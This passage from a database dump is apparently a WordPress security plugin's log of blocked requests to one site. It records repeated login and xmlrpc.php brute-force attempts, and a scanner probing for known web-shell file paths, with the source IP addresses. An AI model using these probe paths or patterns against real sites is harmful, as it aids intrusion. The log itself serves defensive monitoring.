Safari\\/537.36\",\"2\":\"cteisys.com\"}','H4MLyIngr1ClPsKwhciOvJUX',0,1664241562.8766,518,'','GET',403,0,700,0,1,'',0),('103.35.64.73',1730363465,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gO8A6R0imwaqHdSGnWFhjExN',0,1664241808.6396,19323,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','1n9jDtRNov5Q7aZuUw6WMsrg',0,1664241846.8597,551,'','POST',403,0,515,0,1,'',0),('141.94.247.170',2371811242,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/57.0.2987.133 Safari\\/537.36\"}','BpViNHTDJ6ZeXjm95k2IzOrR',0,1664242330.4323,18202,'','POST',403,0,600,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GxSpCKuaF69OEDWMQXehgsfI',0,1664242517.7476,2282,'','POST',403,0,515,0,1,'',0),('43.225.53.24',736179480,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','vtWuNEVCRTaOI78n5UZ10Psm',0,1664242552.1675,1273,'','POST',403,0,515,0,1,'',0),('103.56.160.61',1731764285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','i5OkJTwmb2oRxzfpCIXELKnZ',0,1664243189.4998,18475,'','POST',403,0,515,0,1,'',0),('185.252.31.179',3120308147,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','hMyAHoWNkue10ztR3QPg7BwI',0,1664243220.5809,534,'','POST',403,0,515,0,1,'',0),('185.2.4.134',3103917190,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/78.0.3904.70 Safari\\/537.36\"}','WYAHlTyQZEd9P5njwXeKrVhp',0,1664243313.8334,1880,'','POST',403,0,600,0,1,'',0),('82.165.184.76',1386592332,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','V3XpOdUT7PitLCEBWf2jrJZM',0,1664243900.3363,2432,'','POST',403,0,515,0,1,'',0),('111.90.145.188',1868206524,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','s5roSH7PbWBGtzAuNxKIeDgX',0,1664243909.9945,481,'','POST',403,0,515,0,1,'',0),('45.55.44.23',758590487,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/62.0.3202.94 Safari\\/537.36\"}','kw93e4yY5cSIgOQs1vAxiofG',0,1664244298.0762,17077,'','POST',403,0,600,0,1,'',0),('185.126.219.43',3112098603,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c5omE1vrPD4ijGITk8OKF0zA',0,1664245329.0717,1646,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','gEj3Stik5sH0yn4JWqXdvpLG',0,1664245991.1500,20091,'','POST',403,0,515,0,1,'',0),('61.219.171.85',1037806421,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','zeGbAjfwFKspl081V7PCOS4c',0,1664246045.9251,1410,'','POST',403,0,515,0,1,'',0),('35.192.104.56',599812152,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/65.0.3325.181 Safari\\/537.36\"}','jEHrnF2wztLCds71qNDJoW05',0,1664246280.7996,10756,'','POST',403,0,600,0,1,'',0),('162.144.49.214',2727358934,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','rj5yKkhFwsaLvZ6CDcdbH2Ux',0,1664246702.3702,12020,'','POST',403,0,515,0,1,'',0),('162.14.71.142',2718844814,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','F589qaHzCIBQVUT3gDSYJK7p',0,1664246714.3818,555,'','POST',403,0,515,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/70.0.3538.77 Safari\\/537.36\"}','oscez5MlDGyUXK1V6ZgS8WrO',0,1664247263.4166,17388,'','POST',403,0,600,0,1,'',0),('47.114.72.18',796018706,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/56.0.2924.87 Safari\\/537.36\"}','DOtbAYj6qKCzWa0Ec127udh8',0,1664248263.2241,17285,'','POST',403,0,600,0,1,'',0),('172.104.81.115',2892517747,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qr34xLgcUpJDoGaPiBMuIzEf',0,1664248369.9203,2518,'','POST',403,0,515,0,1,'',0),('148.72.244.254',2487809278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','c0ATbXQOdzSxoDEMtN8UrsgB',0,1664249099.9703,18519,'','POST',403,0,515,0,1,'',0),('67.205.143.236',1137545196,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Orm2ZqB9ifcnhusvRybDHwQA',0,1664249152.3690,1255,'','POST',403,0,515,0,1,'',0),('62.102.148.164',1046910116,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','qcL6CfK80Ex2e9MXlRUgyGhH',0,1664249546.2067,7968,'','POST',403,0,515,0,1,'',0),('103.56.160.61',1731764285,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','uUPKWp0Michd2rR1OvIeQngk',0,1664249831.2273,18792,'','POST',403,0,515,0,1,'',0),('145.239.30.120',2448367224,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','lD6UGoJY5MwAjyLWRczdeZt3',0,1664250266.6181,5001,'','POST',403,0,600,0,1,'',0),('103.90.232.106',1734010986,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','0UgpmRF4t2YrSenOAbfLJ9zq',0,1664250328.6686,1773,'','POST',403,0,515,0,1,'',0),('109.234.161.93',1844093277,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','qAMtPaTnb9LNX5R1ZwSHmBYz',0,1664250366.3110,2547,'','POST',403,0,515,0,1,'',0),('142.93.132.111',2388493423,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Fwvc3LTWXN9hbPuRe5qfVOdK',0,1664250779.5856,18702,'','POST',403,0,515,0,1,'',0),('51.210.99.98',869426018,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','fYD3H8mvzdJXEUyFNg0sTq9M',0,1664250814.8282,506,'','POST',403,0,515,0,1,'',0),('194.233.89.214',3270072790,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','6Lhe9Mos8DXjrwvgmUORnHf0',0,1664251177.8084,3601,'','POST',403,0,515,0,1,'',0),('151.80.20.26',2538607642,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','z5XNl29ISfW7UQjrpPMtgymq',0,1664251963.5900,18414,'','POST',403,0,515,0,1,'',0),('213.149.103.132',3583338372,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','X4dHE8BOaDLQKcxv5spStVeM',0,1664251979.7572,2243,'','POST',403,0,515,0,1,'',0),('213.152.162.84',3583550036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','GLbxWaj07yrtCeQOX9pkdmcq',0,1664252178.5076,6180,'','POST',403,0,515,0,1,'',0),('45.120.69.121',762856825,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/79.0.3945.130 Safari\\/537.36\"}','qGIuNn8FMipBlX2bArz97mtk',0,1664252245.9612,1381,'','POST',403,0,600,0,1,'',0),('103.166.182.177',1738978993,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','HdpX4i26rwQTtJzl0W3kP5m9',0,1664252344.7619,1679,'','POST',403,0,515,0,1,'',0),('213.152.162.84',3583550036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','NwzVf0iHkpTt2y4SvlLEXmhR',0,1664252567.8732,1586,'','POST',403,0,515,0,1,'',0),('194.163.132.194',3265496258,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','O1CyWhfuvsVaX7zPp8KoIUi9',0,1664252719.9641,1648,'','POST',403,0,515,0,1,'',0),('148.72.244.254',2487809278,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','sg7hK8SiT4afrVRUuFdmolQB',0,1664253043.3656,18905,'','POST',403,0,515,0,1,'',0),('47.107.33.26',795549978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','JqiVwsPQ0WcbE7lRYmKkp2f1',0,1664253399.8278,18530,'','POST',403,0,515,0,1,'',0),('192.210.196.65',3235038273,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','CMI7LJEbwHkjhg0ZeqzOQfr3',0,1664253430.7596,776,'','POST',403,0,515,0,1,'',0),('150.230.247.143',2531719055,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','J2vyBupE1xe3hMgKoFT8WSOi',0,1664253797.8411,3895,'','POST',403,0,515,0,1,'',0),('162.214.123.41',2731965225,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) Chrome\\/92.0.4515.159 Safari\\/537.36\"}','396FyxiOrjIEeZTgnvzRmQHu',0,1664253783.8703,17901,'','POST',403,0,515,0,1,'',0),('50.87.230.228',844621540,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','GwcoXheVz5njZ4y8xdDk7E1B',0,1664254140.8045,19195,'','POST',403,0,515,0,1,'',0),('166.62.125.246',2789113334,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/73.0.3683.75 Safari\\/537.36\"}','5G3M7fv02WOoxIwSzukgC4Xc',0,1664254209.8466,1572,'','POST',403,0,600,0,1,'',0),('213.152.186.35',3583556131,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/100.0.4896.127 Safari\\/537.36\"}','gTAQvsfeOdpRG5qFzbXoWxyh',0,1664254427.7209,1416,'','POST',403,0,515,0,1,'',0),('124.158.12.149',2090732693,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','auPx03OHoZSwg2N1trEAKQF6',0,1664254447.8845,682,'','POST',403,0,515,0,1,'',0),('162.241.174.216',2733747928,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','PlHcpsS7ymLtuIj5xDWZifwF',0,1664254478.8532,802,'','POST',403,0,515,0,1,'',0),('139.59.117.30',2335929630,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','acz7UBrhyHWgDPd6XRb9t21C',0,1664254782.1102,1484,'','POST',403,0,515,0,1,'',0),('87.222.28.26',1474173978,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','LdzhOQXIxg3GD5ubfsPycCoB',0,1664254829.6551,1841,'','POST',403,0,515,0,1,'',0),('161.97.88.147',2707511443,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','jRIXqxYoHM8GEKAUzwhZ6Sdm',0,1664255859.2535,9217,'','POST',403,0,515,0,1,'',0),('54.37.156.240',908434672,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/77.0.3865.90 Safari\\/537.36\"}','z8a3hLnuCxHQOIAGkNJ9mtpo',0,1664256134.3601,17841,'','POST',403,0,600,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-content/plugins/core-engine/index.php','','{\"1\":\"Go-http-client\\/1.1\"}','ELUhRZWFP8rQlOBqmA0MYf14',0,1664256152.4117,329,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-includes/SimplePie/index.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','S5RcLPNegby0aFQodzYjq9Ah',0,1664256155.7339,319,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-static.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','uwbtBoO5YrWjZNLJC6ETc8KR',0,1664256157.2170,299,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-content/themes/pridmag/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','5t0kyud3msebDi4A1OVqE9c2',0,1664256158.3321,276,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-content/themes/seotheme/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','mep1GEOHDBThXuaVWQNCILFz',0,1664256160.9875,312,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/years.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','1RUhCGtHirkgmj0YXobL5nux',0,1664256162.1472,335,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/css/index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Qa9ulKsioCSAFJHPg4mz2kB7',0,1664256163.3309,323,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/css/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','E7F8c5SAQPBnvZdpmW26J3ML',0,1664256165.3148,310,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/contents.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Iv0QMCecNmS7fWyVP4dkuFT8',0,1664256166.4070,302,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/css/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','B7g6Oyb0mqMJxS9NFLWQ1iGc',0,1664256167.4644,340,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','3wCOoBT5fK7ncz9sq1LgN4Ib',0,1664256168.5900,317,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/2index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','TAeHrNqI4KjGWua0UPfhzyw2',0,1664256169.7231,289,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/1index.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','lZH8Djf3nMGk9NvpgxS2hYWw',0,1664256170.8158,287,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Kob08yIkrY9vHnQetBVFAJpM',0,1664256171.8788,322,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/load.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','Tg5uYHGbNyzVfpF8iEq9Zchj',0,1664256173.0878,291,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','FHfV6YjtLad5rlveq4I9pQnk',0,1664256174.2186,322,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','OPpgXtV6NWn2zjEQAeDBK0bR',0,1664256175.3423,372,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/xmlrpc.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','nSfHua0FCBbMjXQ4R7kh21gI',0,1664256176.5108,319,'','GET',403,0,515,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/css/votes.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','5IZufwceg3OspjRxV6PtiUSK',0,1664256177.6255,414,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/about.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','QX6PkIvV7uewORLdScD4UZTA',0,1664256178.8151,298,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','0x97PUAIDgheckyRwbq2o1Hj',0,1664256179.8884,349,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-admin/js/widgets/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','15TXEytxVpo6ZrHlLAW9i7Dh',0,1664256181.0308,301,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-admin/css/colors/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','2Uh3oz76dQtLPuX8EAvSZ0sM',0,1664256182.1872,330,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-content/themes/classic/inc/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','LulN2gCpc0TsWjX9xUHBfmr6',0,1664256183.2953,291,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-includes/rest-api/endpoints/radio.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','8utXveYS5gEHTAs64obcFmzQ',0,1664256184.3785,275,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-admin/wikindex.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','6uNPw9jJ5zUDSeiZhbdpLf7Q',0,1664256185.5120,345,'','GET',403,0,700,0,1,'',0),('128.199.105.215',2160552407,'','https://cteisys.com/wp-content/plugins/core-engine/admin.php?673435=1','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; WOW64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/84.0.4147.125 Safari\\/537.36\"}','510fgp7KtSRr9ojyTFxhPOqa',0,1664256186.6370,376,'','GET',403,0,700,0,1,'',0),('150.95.109.187',2522836411,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Z8jQzrTc9Dw6tGp74250Fmvk',0,1664256197.1502,2333,'','POST',403,0,515,0,1,'',0),('103.111.30.40',1735335464,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','MU7I1uQzY9t0Zi6NbRF8Hmwp',0,1664256221.4499,562,'','POST',403,0,515,0,1,'',0),('192.81.214.91',3226588763,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','Di2WrkONHdYcoVZ6UfQ7mKvw',0,1664256555.0691,1680,'','POST',403,0,515,0,1,'',0),('107.180.247.212',1807022036,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','9fH0LrVSFti3xJEvw7MngoTz',0,1664256917.4801,1827,'','POST',403,0,515,0,1,'',0),('85.119.122.23',1433893399,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','x6qG10RglQAawpSLjt73WYoZ',0,1664256911.0536,8358,'','POST',403,0,515,0,1,'',0),('77.240.13.186',1307577786,'','https://cteisys.com/wp-login.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit\\/537.36 (KHTML, like Gecko) Chrome\\/55.0.2883.87 Safari\\/537.36\"}','2AYwSej1ipTLaD5nzkX3ZxOU',0,1664257080.5907,4535,'','POST',403,0,600,0,1,'',0),('188.225.63.143',3168878479,'','http://cteisys.com/wp-commentin.php','','{\"1\":\"Mozilla\\/5.0 (iPad; CPU OS 12_4_8 like Mac OS X) AppleWebKit\\/605.1.15 (KHTML, like Gecko) Version\\/12.1.2 Mobile\\/15E148 Safari\\/604.1\"}','gMa5zNP8pA7qBkyZfte4lSxh',0,1664257201.4296,11898,'','GET',403,0,700,0,1,'',0),('34.68.97.70',574906694,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 Firefox\\/96\"}','KoDIj4mT1YHbARwl29h5cfBN',0,1664257242.3154,6709,'','POST',403,0,515,0,1,'',0),('51.210.251.22',869464854,'','https://cteisys.com/xmlrpc.php','','{\"1\":\"Mozilla\\/5.0 (Windows NT 10.0; Win64; x64; rv:96.0) Gecko\\/20100101 